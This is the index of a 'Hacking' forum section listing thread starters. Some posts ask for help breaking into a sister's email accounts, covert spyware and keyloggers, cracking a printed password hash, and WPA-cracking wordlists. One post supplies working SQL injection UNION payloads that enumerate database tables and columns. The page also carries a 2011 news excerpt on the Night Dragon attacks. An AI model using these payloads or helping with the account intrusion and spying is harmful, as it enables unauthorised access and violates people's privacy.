Hacking

The seedier side of all of the above forums.

msn libero.it skype

hi guys my sister who lives in italy is acting very strange. And i heard things i dont like to say.
her hotmail is [email protected]
her itaian is [email protected]
i tried everything - and as the oldest brother its a matter of priority
thnk u

Spy Software

Anybody have anything like this? I wonder if it's possible to copy the contents of this device. Or on the other hand if someone has a better tool than this I'm all ears.

http://www.gadgetsandgear.com/computer-spy-software-remote-monitoring.html

WHAT IS THE BEST KEY LOGGER?

Ive tried Family Key logger ,, and perfect keylogger... they don't get all the Keys Logged, no matter the settings.

How can I decrypt the following Password...!

$1$WtuBqDDO$u.Nklbn0KaEL2f0TmCgqu0

pentesting distro

ok i know this is the best community for this question, Crazy
currently i am running & learning BT4 r2 ,but want to use different but good pentesting distro,
any suggestions ?
all the high council members i want your suggestions. Wink

Gmail question

So i was wondering if i could retrieve the IP address from the sender of an email, and then trace it to there locations. Im not to familiar with tracing or retrieving IP addresses, so any help is appreciated. Thanks

Some Updated Queries For SQL Injection

I would just like to correct some queries for sql injection so that some would not have some problems in inserting queries to an sql vulnerable site.

PROBLEM

union select 1,2,group_concat(table_name),4,5 from information_schema.tables--

or

union select all 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()

And so here is the latest update in order to fix the problem:

Updated

union select 1,2,group_concat(table_name),4,5 +from+information_schema.tables+where+ table_schema=database()--

or

union select 1,2,group_concat(column_name),4,5 +from+information_schema.columns+where table_schema=database()--  

==================================

Oil giants downed by Chinese hackers

By: John E Dunn On: 24 Feb 2011 For: Techworld.com
A new U.S. report also alleges that the companies did not disclose the attacks to regulators

The Western energy companies at the centre of the alleged 'Night Dragon' attacks by Chinese hackers uncovered earlier this month have been named as Exxon, Shell, BP, Marathon, ConocoPhillips and oil services company Baker Hughes, according to U.S. reports.

The attacks were revealed by McAfee last month, which documented a sustained, long-running and ultimately successful campaign by Chinese-based attackers to penetrate major energy companies in order to steal sensitive documents.

An unsourced report for Bloomberg has named the companies involved which in truth is more akin to running down a list of the usual suspects. McAfee's document on Night Dragon left little to the imagination in working out which companies the attackers had targeted during the campaign.

Anyone able to answer this?

Mitigating cloud server risks during DDoS attacks: During recent DDoS attacks, the hackers are able to bring down all customers hosted on the targeted customer's service. Suggestions for mitigating that risk?
- It is for a contest and I have no f'in idea, lol. Any suggestions would be appreciated, unless it is to use VS to build a GUI in order to trace the attackers IP address in order to go and kill their Grandmas. Thanks!

Wordlists

Anyone know where I can get some nice wordlists for wpa / wpa2 cracking. Im using backtract w/ an Alfa USB and wanted to grow my collection. I already have some lists I gathered from various places, not a large collection, and wanted something good and more reliable then the small stuff i got.

Syndicate content